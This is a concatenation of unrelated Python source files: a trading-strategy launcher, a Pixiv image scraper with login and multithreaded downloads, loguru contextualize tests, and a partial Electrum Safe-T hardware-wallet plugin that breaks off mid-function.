print('-'*30)
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
# le.addConsoleHandler()
# le.addFileHandler()
le.info(u'启动CTA策略运行子进程')
ee = EventEngine2()
le.info(u'事件引擎创建成功')
me = MainEngine(ee)
me.addGateway(okexGateway)
me.addApp(ctaStrategy)
le.info(u'主引擎创建成功')
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_CTA_LOG, le.processLogEvent)
le.info(u'注册日志事件监听')
KEY = findConnectKey()
me.connect(KEY)
le.info(u'连接行情和交易接口')
sleep(5) # wait for the gateway to finish initializing
me.dataEngine.saveContracts() # save contract info to file
cta = me.getApp(ctaStrategy.appName)
cta.loadSetting()
cta.initAll()
cta.startAll()
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.addFileHandler()
le.info(u'启动CTA策略守护父进程')
DAY_START = time(8, 45) # day session start and stop times
DAY_END = time(15, 30)
NIGHT_START = time(20, 45) # night session start and stop times
NIGHT_END = time(2, 45)
p = None # child process handle
while True:
currentTime = datetime.now().time()
recording = False
# Determine which trading session we are currently in
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
# During trading hours, start the child process if it is not running
if recording and p is None:
le.info(u'启动子进程')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info(u'子进程启动成功')
# Outside trading hours, shut the child process down
if not recording and p is not None:
le.info(u'关闭子进程')
p.terminate()
p.join()
p = None
le.info(u'子进程关闭成功')
sleep(5)
if __name__ == '__main__':
runChildProcess() # 7x24 unattended operation
# Even with unattended operation, a manual check at each daily start is strongly recommended; be responsible for your own PnL
#runParentProcess()
|
scraper_manga.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__all__ = ['login', 'set_value', 'save_garage', 'dl_tag', 'dl_artist', 'dl_bookmark', 'dl_rank_global', 'dl_rank_daily',
'dl_rank_weekly', 'dl_rank_original', 'dl_rank_daily_r18', 'dl_rank_male_r18', 'dl_rank_weekly_r18',
'dl_diy_urls', 'random_one_by_classfi', 'get_value']
__author__ = "Akaisora"
import copy
import datetime
import functools
import inspect
import os
import random
import re
import sys
import threading
import time
import traceback
from functools import wraps
# import configparser
from html import unescape
import json
import pixiv_crawler.myconfig as config
import requests
from lxml import html
from pixiv_crawler.login_sim import login_for_cookies
filenameList = []
def login(save_cookies=True):
if os.path.exists(config.cookies_file):
try:
with open(config.cookies_file, "r") as f:
cookies_js = json.load(f)
cookiejar = requests.utils.cookiejar_from_dict(cookies_js, cookiejar=None, overwrite=True)
session_requests.cookies = cookiejar
except Exception as e:
print("load cookies failed, try log in")
traceback.print_exc()
r = None
try:
r = session_requests.get(pixiv_root)
except Exception as e:
traceback.print_exc()
print(e)
if r is not None and r.status_code == 200 and re.search('not-logged-in', r.text) is None:
print("loaded cookies")
return
# check username & password
if not config.username: raise Exception('Please set username')
if not config.password: raise Exception('Please set password')
# old login method, not work for captcha
# login_url='https://accounts.pixiv.net/login'
# r=session_requests.get(login_url)
# tree=html.fromstring(r.text)
# authenticity_token=list(set(tree.xpath("//input[@name='post_key']/@value")))[0]
# payload={
# 'pixiv_id':config.username,
# 'password':config.password,
# 'post_key':authenticity_token
# }
# r=session_requests.post(
# login_url,
# data=payload,
# headers=dict(referer=login_url)
# )
print("try log in")
cookies_dict = login_for_cookies(config)
cookiejar = requests.utils.cookiejar_from_dict(cookies_dict, cookiejar=None, overwrite=True)
session_requests.cookies = cookiejar
r = session_requests.get(pixiv_root)
if re.search('not-logged-in', r.text) is not None:
raise IOError('login failed, may deleting the cookies file can help')
else:
# print("log in")
if save_cookies:
with open(config.cookies_file, "w") as f: # 第一次登录后将存档cookies用来登录
cookies_js = requests.utils.dict_from_cookiejar(session_requests.cookies)
json.dump(cookies_js, f)
def appendFilename(func):
@wraps(func)
def decorator(imgurl, filename, header=None, imgid=None, imgidext=None):
returnValue = func(imgurl, filename, header=header, imgid=imgid, imgidext=imgidext)
if returnValue:
filenameList.append(filename)
return returnValue
return decorator
@appendFilename
def downloadImage(imgurl, filename, *, header=None, imgid=None, imgidext=None):
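"""Download imgurl to filename; on success record the image id in the garage set, on failure append to faillog."""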
print("%s is downloading %s" % (threading.current_thread().name, filename))
try:
if header:
r = session_requests.get(imgurl, headers=header, timeout=30)
else:
r = session_requests.get(imgurl, timeout=30)
if r.status_code == 200:
try:
write_rlock.acquire()
with open(filename, 'wb') as f:
f.write(r.content)
finally:
write_rlock.release()
else:
raise IOError('requestFailed')
except Exception as e:
print('FAIL %s failed to download %s' % (threading.current_thread().name, filename))
if os.path.exists(filename): os.remove(filename)
faillog.append(filename)
traceback.print_exc()
return False
else:
print('SUCCESS %s has successfully downloaded %s' % (threading.current_thread().name, filename))
try:
garage_rlock.acquire()
if imgidext:
garage.add(imgidext)
elif imgid:
garage.add(imgid)
finally:
garage_rlock.release()
return True
# def listener():
# while(listen_active):
# x=input()
# if x=="q":
# try:
# garage_rlock.acquire()
# if os.path.exists(config.garage_file) :
# with open(config.garage_file,"r") as f:
# garage.update(f.read().split())
# with open(config.garage_file,"w") as f:
# f.write(" ".join(garage))
# print("local garage update complete")
# synchronize_garage()
# break
# finally:garage_rlock.release()
# elif x=="e":
# break
def synchronize_garage(): # when downloading on multiple machines, sync the garage file to a server to avoid duplicate downloads
try:
if not config.syn_enable: return
private_key = paramiko.RSAKey.from_private_key_file(config.RSAKey_file)
transport = paramiko.Transport((config.sftp_host, config.sftp_port))
transport.connect(username=config.sftp_username, pkey=private_key)
sftp = paramiko.SFTPClient.from_transport(transport)
remotedir = config.sftp_remotedir
if "garage" not in sftp.listdir(remotedir):
sftp.put("garage", remotedir + "garage")
sftp.get(remotedir + "garage", "tmp_garage")
with open("tmp_garage", "r") as f:
garage.update(f.read().split())
os.remove("tmp_garage")
with open("garage", "w") as f:
f.write(" ".join(garage))
sftp.put("garage", remotedir + "garage")
print("synchronize garage succeeded")
except Exception as e:
print("synchronize garage failed")
print(e)
finally:
try:
transport.close()
except Exception as e:
pass
def testrecommen(): # unfinished feature
r = session_requests.get(pixiv_root + "recommended.php")
tree = html.fromstring(r.text)
token = tree.xpath("/pixiv.context.token")
print(token)
# "//input[@name='post_key']/@value"
def complete_urllist(clsf):
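"""Expand the high-level classification spec into (name, url list) pairs that batch_download can iterate over."""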
def get_artist_imglist(artistid):
try:
url = config.url_artist_all_template % (artistid)
r = session_requests.get(url)
js = r.json()
imglist = list(dict(js['body']['illusts']).keys()) + list(dict(js['body']['manga']).keys())
return imglist
except Exception as e:
traceback.print_exc()
return []
def get_artist_artistname(artistid):
try:
url = config.url_artist_template % (artistid, 1)
r = session_requests.get(url)
res = re.search(r'"userId":"\d+","name":"([^"]*)"?', r.text)
artist_name = res.group(1)
artist_name = artist_name.encode('utf-8').decode('unicode_escape')
return artist_name
except Exception as e:
traceback.print_exc()
return "artist_" + artistid
newclsf = []
for clsf_name, item_list in clsf:
if clsf_name == "tag":
for tag, pagenum in item_list: newclsf.append(
("tag-" + tag, [config.url_tag_template % (tag, p) for p in range(1, pagenum + 1)]))
elif clsf_name == "illustrator":
for artistname, artistid, pagenum in item_list:
if artistname == '?':
artistname = get_artist_artistname(artistid)
imglist = get_artist_imglist(artistid)
newclsf.append(("illustrator-" + artistname, [imglist]))
elif clsf_name == "bookmark":
# for bookmark, the value is the number of pages
pagenum = item_list
newclsf.append(("bookmark", [config.url_bookmark_template % (p) for p in range(1, pagenum + 1)]))
elif clsf_name == "rank_global":
newclsf.append(("rank_global", [config.url_rank_global_template]))
elif clsf_name in ["rank_daily", "rank_weekly", "rank_original", "rank_daily_r18", "rank_male_r18",
"rank_weekly_r18"]:
url_template = getattr(config, "url_" + clsf_name + "_template")
pagenum = item_list
newclsf.append((clsf_name, [url_template % (p) for p in range(1, pagenum + 1)]))
else:
newclsf.append((clsf_name, item_list))
return newclsf
def get_master_imagelist_from_resp(classi, r):
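"""Extract illust ids from a page response: tag and bookmark pages get dedicated parsers, anything else falls back to a regex over img-master URLs."""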
def gmifr_tag(r):
url = r.url
# url=url.replace("/artworks","")
url = re.sub(r"/[a-zA-Z]+?(?=\?)", "", url, count=1)
url = url.replace("/tags/", "/ajax/search/artworks/")
ajax = url
r = session_requests.get(ajax)
js = r.json()
popular_permen_list = list(map(lambda x: x['illustId'], js['body']['popular']['permanent']))
popular_rec_list = list(map(lambda x: x['illustId'], js['body']['popular']['recent']))
data_list = list(map(lambda x: x['illustId'], js['body']['illustManga']['data']))
retlist = popular_permen_list + popular_rec_list + data_list
return retlist
def gmifr_bookmark(r):
tree = html.fromstring(r.text)
res = tree.xpath("//div[@data-items]/@data-items")[0]
js = json.loads(unescape(res))
retlist = list(map(lambda x: x['illustId'], js))
return retlist
try:
# print(r.text)
print(r.url)
if classi == "tag":
retlist = gmifr_tag(r)
elif classi == "bookmark":
retlist = gmifr_bookmark(r)
else:
retlist = re.findall(r'(?<=img-master/img)(.*?)(?=_master)', r.text)
try:
retlist_temp = gmifr_tag(r)
retlist.extend(retlist_temp)
except Exception as e:
pass
try:
retlist_temp = gmifr_bookmark(r)
retlist.extend(retlist_temp)
except Exception as e:
pass
retlist = list(set(retlist))
return retlist
except Exception as e:
traceback.print_exc()
return []
def check_tempfile_overflow(maxitems):
if not os.path.exists(config.temp_save_root): os.makedirs(config.temp_save_root)
temp_file_list = os.listdir(config.temp_save_root)
if (len(temp_file_list) > maxitems):
for filename in temp_file_list: os.remove(config.temp_save_root + filename)
print("cleared config.temp_save_root")
def random_one_by_classfi(classi, label="fate"):
'''classi= "normalrank" or "tag" or "r18rank" '''
try:
if classi == "tag" and "r-18" not in label.lower(): label += " -r-18"
check_tempfile_overflow(config.max_tempfile_number)
if not os.path.exists(config.local_save_root): os.makedirs(config.local_save_root)
if classi.lower() == "normalrank":
classification = [("normalRank",
[pixiv_root + "ranking.php?mode=daily&p=1", pixiv_root + "ranking.php?mode=daily&p=2",
pixiv_root + "ranking.php?mode=original"])]
elif classi.lower() == "tag":
classification = complete_urllist([("tag", [(label, 5)])])
elif classi.lower() == "r18rank":
classification = complete_urllist([("r18Rank", [pixiv_root + "ranking.php?mode=daily_r18&p=1",
pixiv_root + "ranking.php?mode=male_r18&p=1",
pixiv_root + "ranking.php?mode=weekly_r18&p=1",
pixiv_root + "ranking.php?mode=weekly_r18&p=2"])])
else:
return None
try:
login()
except Exception as e:
print(e)
print('Connect failed')
return None
url = random.choice(classification[0][1])
r = session_requests.get(url)
# imagelist=re.findall(r'(?<=img-master/img)(.*?)(?=_master)',r.text)
imagelist = get_master_imagelist_from_resp(classi.lower(), r)
if (not imagelist) and classi.lower() == 'tag':
url = random.choice(complete_urllist([("tag", [(label, 1)])])[0][1])
r = session_requests.get(url)
imagelist = get_master_imagelist_from_resp(classi.lower(), r)
if r.status_code != 200 or not imagelist: return None
img = random.choice(imagelist)
imgid = re.search(r'\d+(?=(_|$))', img).group(0)
toDownlist = imgid2source_url(imgid, "single", config.local_save_root)
if len(toDownlist) > 0:
orgurl, filename = toDownlist[0]
else:
return None
if os.path.exists(filename): return filename
refer = referpfx + imgid
imgidext = os.path.splitext(os.path.basename(filename))[0]
# print(orgurl,filename,refer,imgid,imgidext)
# exit(0)
if downloadImage(orgurl, filename, header={"referer": refer}, imgid=imgid, imgidext=imgidext):
return filename
else:
return None
except Exception as e:
traceback.print_exc()
def imgid2source_url(imgid, mode="single", local_save=None):
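"""Resolve an illust id to (original image url, local filename) pairs using the page's meta-preload-data JSON."""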
if not local_save: local_save = config.local_save_root
refer = referpfx + imgid
try:
toDownlist = []
r = session_requests.get(refer, timeout=25)
tree = html.fromstring(r.text)
content = tree.xpath("/html/head/meta[@id='meta-preload-data']/@content")[0]
jsdata = content
if jsdata:
js = json.loads(jsdata)
else:
print("load jsdata fail")
return []
js = js["illust"][imgid]
pageCount = js["pageCount"]
match_manga = pageCount > 1
original_url = js['urls']['original']
if mode == "single":
toDownlist.append((original_url, local_save + os.path.split(original_url)[1]))
else:
for i in range(0, pageCount):
original_url_p = original_url.replace("p0", "p" + str(i))
toDownlist.append((original_url_p, local_save + os.path.split(original_url_p)[1]))
return toDownlist
except Exception as e:
faillog.append(imgid)
print(e)
return []
def load_config():
global proxies
if config.proxies_enable:
proxies = {'http': config.socks, 'https': config.socks}
else:
proxies = None
for ch in ['%y', '%m', '%d', '%H', '%M', '%S']:
config.local_save_root = config.local_save_root.replace(ch, datetime.datetime.now().strftime(ch))
# classi_list=['normalRank','r18Rank','bookmark','tag','illustrator']
# classification=[]
# for classi in classi_list:
# if config.getboolean('classification',classi):
# classification.append((classi,eval(config['classification'][classi+'_list'])))
# ----------Constants
pixiv_root = "https://www.pixiv.net/"
referpfx = r'https://www.pixiv.net/member_illust.php?mode=medium&illust_id='
# ----------global vars
load_config()
if config.syn_enable: import paramiko
session_requests = requests.session()
session_requests.proxies = proxies
write_rlock = threading.RLock()
garage_rlock = threading.RLock()
garage = set()
faillog = []
def batch_download(classification, max_pic_num=100, deep_into_manga=False, add_classname_in_path=True):
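"""Collect illust ids for every (classification, url list) entry and download the originals with up to config.max_thread_num worker threads."""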
global listen_active
# ----------PREDO
# Try to log in; login is handled separately
# try: login()
# except Exception as e:print(e);print('Connect failed');traceback.print_exc();exit(0)
# Create the save directory
if not os.path.exists(config.local_save_root): os.makedirs(config.local_save_root)
# Check the garage file and update the in-memory garage set
if os.path.exists(config.garage_file): # the garage file lists already-downloaded images to avoid duplicates
with open(config.garage_file, "r") as f:
garage.update(f.read().split())
classification = complete_urllist(classification)
# exit(0)
# synchronize_garage()
pic_num = 0
# faillog=[]
threads = []
# write_rlock=threading.RLock()
# garage_rlock=threading.RLock()
# ----------MAINPROC
# listen_active=True
# t=threading.Thread(target=listener)
# t.start()
for classi, urlList in classification:
local_save = config.local_save_root + (classi + "/" if add_classname_in_path else "")
if not os.path.exists(local_save): os.makedirs(local_save)
classi_mode = "tag" if "tag" in classi else "illustrator" if "illustrator" in classi else classi
for pageUrl in urlList:
try:
if classi_mode == "illustrator":
imagelist = pageUrl
else:
rankPage = session_requests.get(pageUrl)
imagelist = get_master_imagelist_from_resp(classi_mode, rankPage)
except Exception as e:
faillog.append(pageUrl + "Pagefail")
continue
for img in imagelist:
try:
imgid = re.search(r'\d+(?=(_|$))', img).group(0)
except Exception as e:
print('fail : ' + img)
faillog.append(img)
continue
refer = referpfx + imgid
# prune early when not in manga (multi-page) mode
if (not deep_into_manga and imgid + "_p0" in garage):
print("Skipped %s" % imgid)
continue
toDownlist = imgid2source_url(imgid, "manga" if deep_into_manga else "single", local_save)
for orgurl, filename in toDownlist:
imgidext = os.path.splitext(os.path.basename(filename))[0]
if (imgidext in garage) and not ("illustrator" == classi_mode):
print("Skipped %s" % imgid)
continue
if os.path.exists(filename):
print("image file %s existed" % imgid)
garage.add(imgidext)
continue
print("<" + orgurl + ">")
t = threading.Thread(target=downloadImage, args=(orgurl, filename),
kwargs={"header": {"referer": refer}, "imgid": imgid, "imgidext": imgidext})
threads.append(t)
while sum(map(lambda x: 1 if x.is_alive() else 0, threads)) >= config.max_thread_num: time.sleep(1)
t.start()
# enforce the picture count limit and finish early
pic_num += 1
if max_pic_num != -1 and pic_num >= max_pic_num:
for t in threads:
if t.is_alive(): t.join()
if faillog:
print('-------------------------faillog-------------------------')
for log in faillog: print(log)
return
for t in threads:
if t.is_alive(): t.join()
# _______________AFTER
if faillog:
print('-------------------------faillog-------------------------')
for log in faillog: print(log)
# with open(config.garage_file,"w") as f:
# f.write(" ".join(garage))
# synchronize_garage()
# listen_active=False
# print("END")
# FUNCTIONS
def set_value(value_name, value):
'''Legal attributes:
username
password
local_save_root
garage_file
cookies_file
max_thread_num
socks: set None if not use
'''
if value_name not in ['username', 'password', 'local_save_root', 'garage_file', 'cookies_file', 'max_thread_num',
'socks', 'phantomjs', 'firefox', 'chrome']:
raise ValueError("Illegal Attribute")
if value_name == "socks":
if not value:
config.proxies_enable = False
session_requests.proxies = None
else:
value = value.replace("socks5h://", "")
setattr(config, value_name, "socks5h://" + value)
config.proxies_enable = True
proxies = {'http': config.socks, 'https': config.socks}
session_requests.proxies = proxies
elif value_name == "local_save_root":
if value[-1] != '/': value = value + "/"
for ch in ['%y', '%m', '%d', '%H', '%M', '%S']:
if ch in value: value = value.replace(ch, datetime.datetime.now().strftime(ch))
setattr(config, value_name, value)
else:
setattr(config, value_name, value)
def get_value(value_name):
'''Legal attributes:
username
password
local_save_root
garage_file
cookies_file
max_thread_num
socks: set None if not use
'''
if value_name not in ['username', 'password', 'local_save_root', 'garage_file', 'cookies_file', 'max_thread_num',
'socks', 'phantomjs', 'firefox', 'chrome']:
return None
return getattr(config, value_name)
def save_garage(garage_file=None):
'''Save downloaded image list, to avoid repeating downloading'''
if not garage_file:
garage_file = config.garage_file
with open(garage_file, "w") as f:
f.write(" ".join(garage))
def resetAndReturnFilenameList(func):
sig = inspect.signature(func)
@wraps(func)
def decorator(*args, **kwargs):
bound_arguments = sig.bind(*args, **kwargs)
bound_arguments.apply_defaults()
pic_num = bound_arguments.arguments["pic_num"]
deep_into_manga = bound_arguments.arguments["deep_into_manga"]
add_classname_in_path = bound_arguments.arguments["add_classname_in_path"]
return_list = []
for item in ["tag", "artist_id", "urls"]:
try:
argument = bound_arguments.arguments[item]
func(argument,
pic_num=pic_num,
deep_into_manga=deep_into_manga,
add_classname_in_path=add_classname_in_path)
while len(filenameList) != 0:
return_list.append(filenameList.pop())
return return_list
except KeyError:
pass
func(pic_num=pic_num,
deep_into_manga=deep_into_manga,
add_classname_in_path=add_classname_in_path)
while len(filenameList) != 0:
return_list.append(filenameList.pop())
return return_list
return decorator
@resetAndReturnFilenameList
def dl_tag(tag, pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "tag")
classification = [("tag", [(tag, (pic_num + ppp - 1) // ppp)])]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_artist(artist_id, pic_num, deep_into_manga=True, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "illustrator")
classification = [("illustrator", [("?", artist_id, -1 if pic_num == -1 else ((pic_num + ppp - 1) // ppp))])]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_bookmark(pic_num, deep_into_manga=True, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "bookmark")
classification = [("bookmark", (pic_num + ppp - 1) // ppp)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_rank_global(pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "rank_global")
classification = [("rank_global", 1)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_rank_daily(pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "rank_daily")
classification = [("rank_daily", (pic_num + ppp - 1) // ppp)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_rank_weekly(pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "rank_weekly")
classification = [("rank_weekly", (pic_num + ppp - 1) // ppp)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_rank_original(pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "rank_original")
classification = [("rank_original", (pic_num + ppp - 1) // ppp)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_rank_daily_r18(pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "rank_daily_r18")
classification = [("rank_daily_r18", (pic_num + ppp - 1) // ppp)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_rank_male_r18(pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "rank_male_r18")
classification = [("rank_male_r18", (pic_num + ppp - 1) // ppp)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_rank_weekly_r18(pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "rank_weekly_r18")
classification = [("rank_daily", (pic_num + ppp - 1) // ppp)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_diy_urls(urls, pic_num, deep_into_manga=False, add_classname_in_path=True):
if not isinstance(urls, list):
urls = [urls]
classification = [("DIY_urls", urls)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
if __name__ == "__main__":
pass
# batch_download()
# print(random_one_by_classfi("tag", "azurlane"))
# login()
# print("login in")
# print(get_artist_artistname("21848"))
|
test_contextualize.py
|
import asyncio
import sys
import threading
import pytest
from loguru import logger
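# These tests exercise logger.contextualize(), which scopes "extra" values to a with-block,
# decorator, coroutine or thread and restores the previous context on exit.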
def test_contextualize(writer):
logger.add(writer, format="{message} {extra[foo]} {extra[baz]}")
with logger.contextualize(foo="bar", baz=123):
logger.info("Contextualized")
assert writer.read() == "Contextualized bar 123\n"
def test_contextualize_as_decorator(writer):
logger.add(writer, format="{message} {extra[foo]} {extra[baz]}")
@logger.contextualize(foo=123, baz="bar")
def task():
logger.info("Contextualized")
task()
assert writer.read() == "Contextualized 123 bar\n"
def test_contextualize_in_function(writer):
logger.add(writer, format="{message} {extra}")
def foobar():
logger.info("Foobar!")
with logger.contextualize(foobar="baz"):
foobar()
assert writer.read() == "Foobar! {'foobar': 'baz'}\n"
def test_contextualize_reset():
contexts = []
output = []
def sink(message):
contexts.append(message.record["extra"])
output.append(str(message))
logger.add(sink, format="{level} {message}")
logger.info("A")
with logger.contextualize(abc="def"):
logger.debug("B")
logger.warning("C")
logger.info("D")
assert contexts == [{}, {"abc": "def"}, {"abc": "def"}, {}]
assert output == ["INFO A\n", "DEBUG B\n", "WARNING C\n", "INFO D\n"]
@pytest.mark.xfail(sys.version_info < (3, 5, 3), reason="ContextVar backport not supported")
def test_contextualize_async(writer):
logger.add(writer, format="{message} {extra[i]}", catch=False)
async def task():
logger.info("Start")
await asyncio.sleep(0.1)
logger.info("End")
async def worker(i):
with logger.contextualize(i=i):
await task()
async def main():
workers = [worker(i) for i in range(5)]
await asyncio.gather(*workers)
await logger.complete()
asyncio.run(main())
assert sorted(writer.read().splitlines()) == ["End %d" % i for i in range(5)] + [
"Start %d" % i for i in range(5)
]
def test_contextualize_thread(writer):
logger.add(writer, format="{message} {extra[i]}")
def task():
logger.info("Processing")
def worker(entry_barrier, exit_barrier, i):
with logger.contextualize(i=i):
entry_barrier.wait()
task()
exit_barrier.wait()
entry_barrier = threading.Barrier(5)
exit_barrier = threading.Barrier(5)
threads = [
threading.Thread(target=worker, args=(entry_barrier, exit_barrier, i)) for i in range(5)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert sorted(writer.read().splitlines()) == ["Processing %d" % i for i in range(5)]
def test_contextualize_before_bind(writer):
logger.add(writer, format="{message} {extra[foobar]}")
logger_2 = logger.bind(foobar="baz")
with logger.contextualize(foobar="baz_2"):
logger.info("A")
logger_2.info("B")
logger_2.info("C")
assert writer.read() == "A baz_2\nB baz\nC baz\n"
def test_contextualize_after_bind(writer):
logger.add(writer, format="{message} {extra[foobar]}")
with logger.contextualize(foobar="baz"):
logger_2 = logger.bind(foobar="baz_2")
logger.info("A")
logger_2.info("B")
logger_2.info("C")
assert writer.read() == "A baz\nB baz_2\nC baz_2\n"
def test_contextualize_using_bound(writer):
logger.add(writer, format="{message} {extra[foobar]}")
logger_2 = logger.bind(foobar="baz")
with logger_2.contextualize(foobar="baz_2"):
logger.info("A")
logger_2.info("B")
logger_2.info("C")
assert writer.read() == "A baz_2\nB baz\nC baz\n"
def test_contextualize_before_configure(writer):
logger.add(writer, format="{message} {extra[foobar]}")
logger.configure(extra={"foobar": "baz"})
with logger.contextualize(foobar="baz_2"):
logger.info("A")
logger.info("B")
assert writer.read() == "A baz_2\nB baz\n"
def test_contextualize_after_configure(writer):
logger.add(writer, format="{message} {extra[foobar]}")
with logger.contextualize(foobar="baz"):
logger.configure(extra={"foobar": "baz_2"})
logger.info("A")
logger.info("B")
assert writer.read() == "A baz\nB baz_2\n"
def test_nested_contextualize(writer):
logger.add(writer, format="{message} {extra[foobar]}")
with logger.contextualize(foobar="a"):
with logger.contextualize(foobar="b"):
logger.info("B")
logger.info("A")
with logger.contextualize(foobar="c"):
logger.info("C")
assert writer.read() == "B b\nA a\nC c\n"
def test_context_reset_despite_error(writer):
logger.add(writer, format="{message} {extra}")
try:
with logger.contextualize(foobar=456):
logger.info("Division")
1 / 0
except ZeroDivisionError:
logger.info("Error")
assert writer.read() == "Division {'foobar': 456}\nError {}\n"
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, versiontuple, UserCancelled
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import deserialize_xpub
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'Safe-T mini', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
